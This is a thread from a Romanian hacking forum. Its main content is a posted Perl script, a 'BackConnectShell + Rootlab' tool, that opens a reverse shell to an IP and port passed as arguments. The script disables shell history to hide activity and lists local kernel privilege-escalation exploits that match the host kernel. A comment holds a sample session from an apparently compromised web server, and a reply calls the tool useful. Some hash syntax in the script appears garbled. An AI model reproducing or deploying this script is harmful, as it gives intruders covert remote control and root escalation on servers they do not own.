Jump to content
zbeng

[PERL] - BackConnectShell + Rootlab t00l

By zbeng, in Programare

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted 

#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# [email]3sk0rbut0@gmail.com[/email]
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA

# ******* ConnectBack Shell *******

# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest

# Kernel local:
# 2.6.9-022stab078.14-smp

# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

use IO::Socket;     
use Socket;
use FileHandle;

  $system   = '/bin/bash';
if(!$ARGV[0])
      {
print "\nBackConnect Shell - D.O.M TEAM\n\n";
print "Usage: perl $0 [IPHOST] [NCPORT]\n";
print "Example: perl $0 82.85.55.21 6850\n\n";
  exit;
}

  socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
        die print "[-] Protocolo Desconocido\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
            die print "[-] Error Socket\n";
print "[+] BackConnect Shell\n";
print "[+] Conectando a $ARGV[0]... \n";
print "[+] Enviando Shell... \n";
print "[+] Conectado. \n";
        SOCKET->autoflush();
                  open(STDIN, ">&SOCKET");
            open(STDOUT,">&SOCKET");
       open(STDERR,">&SOCKET");
print "\n******* ConnectBack Shell *******\n\n";
  system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");

# Rootkernel

my $khost = `uname -r`;
chomp($khost);
print "\nKernel local: $khost\n\n";

my %h;
$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };
$hsd_'elflbl' = { vuln=>['2.4.29'] };
$hsd_'elfdump' = { vuln=>['2.4.27'] };
$hsd_'expand_stack' = { vuln=>['2.4.29'] };
$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$hsd_'kdump' = { vuln=>['2.6.13'] };
$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };
$hsd_'krad' = { vuln=>['2.6.11'] };
$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };
$hsd_'local26' = { vuln=>['2.6.13'] };
$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };
$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };
$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace24' = { vuln=>['2.4.9'] };
$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };
$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$hsd_'remap' = { vuln=>['2.4.'] };
$hsd_'rip' = { vuln=>['2.2.'] };
$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };
$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$hsd_'newsmp' = { vuln=>['2.6.'] };
$hsd_'smpracer' = { vuln=>['2.4.29'] };
$hsd_'loginx' = { vuln=>['2.4.22'] };
$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$hsd_'prctl' = { vuln=>['2.6.'] };
$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };

&busca;
sub busca {
foreach my $key(keys %h){

foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){

     if($khost=~/^$kernel/){
         chop($kernel) if ($kernel=~/\.$/);
         print "P0sible 3xploit: ". $key ."\n";
         }
      }
   }
}
print "\n";
system 'export TERM=xterm;exec sh -i';
system($system);

Link to comment
Share on other sites
Guest flama

Guest flama

Posted
Posted

foarte interesant ... cred ca ai greshit totushi sectziunea acesta fiind coltzul programatorilor ... shi cum nu tu ai programat ... mai potrivit era hack tools. iti sugerez sa il mutzi, sa iti dai warn shi sa iti tragi shi 2 palme peste fund. oricum e usefull toolu gg.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...